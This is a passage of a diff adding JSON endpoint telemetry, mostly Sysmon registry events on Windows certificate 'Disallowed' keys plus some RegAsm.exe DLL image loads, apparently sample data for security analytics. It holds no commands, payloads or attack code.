"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\SysWOW64\\SHCore.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570865580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\SysWOW64\\windows.storage.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864490000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\profapi.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864490000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\SysWOW64\\powrprof.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864650000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\SysWOW64\\fltLib.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864650000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcr120_clr0400.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\setupapi.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\SysWOW64\\mpr.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570866210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570866360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 